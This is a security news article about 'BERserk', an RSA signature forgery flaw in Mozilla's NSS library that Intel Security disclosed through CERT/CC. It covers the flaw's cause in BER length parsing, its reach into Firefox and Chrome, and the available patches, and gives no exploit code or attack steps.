The Mozilla Network Security Services (NSS) crypto library has gone “BERserk,” as it were, with the discovery of a critical signature forgery vulnerability: RSA signatures to be successfully forged without knowledge of the corresponding RSA private key.
The Intel Security Advanced Threat Research Team discovered the flaw and coined the name BERserk, for it, noting that it could allow malicious parties to set up fraudulent sites that masquerade as legitimate businesses and other organizations protected by secure sockets layer (SSL) encryption.
For example, an attacker can forge/spoof the authentication between an end user and their bank website in a classic man-in-the-middle scenario. All personal data communicated in the browser session can be intercepted and/or compromised, so both the integrity and confidentiality of the data exchanged in that session are at risk. But to the user, it looks like an SSL-protected site, complete with the https:// addressing and padlock symbol at the top.
“This vulnerability allows for attackers to forge RSA signatures, thereby allowing for the bypass of authentication to websites utilizing SSL/TLS,” James Walter, director of advanced threat research of Intel Security, noted in an advisory. “Given that certificates can be forged for any domain, this issue raises serious concerns around integrity and confidentiality as we traverse what we perceive to be secure websites.”
The reach is fairly broad as well: While the Mozilla NSS library is commonly utilized in the Firefox web browser it can also be found in Thunderbird, Seamonkey and other Mozilla products, and it’s used by Google Chrome and Chrome OS.
And why is it called BERserk, one might ask?
“This attack exploits a vulnerability in the parsing of ASN.1 encoded messages during signature verification; ASN.1 messages are made up of various parts that are encoded using BER (Basic Encoding Rules) and/or DER (Distinguished Encoding Rules),” Walter explained. “This attack exploits the fact that the length of a field in BER encoding can be made to use many bytes of data. In vulnerable implementations, these bytes are then skipped during parsing. This condition enables the attack.”
The tactic is, interestingly, not new; this is a variant of Daniel Bleichenbacher’s PKCS#1 v1.5 RSA Signature Forgery vulnerability (CVE-2006-4339) from 2006.
“Upon discovery of this issue, our team engaged CERT/CC in an effort to ensure that all affected parties were responsibly and effectively notified and given proper guidance around this issue,” Intel added. “The Intel Security Advanced Threat Research team is continuing to work with CERT/CC in addition to reviewing other commonly used cryptographic libraries for this issue.”
Individual Firefox browser users can take immediate action by updating their browsers with the latest patches from Mozilla. Google has also released updates for Google Chrome and ChromeOS.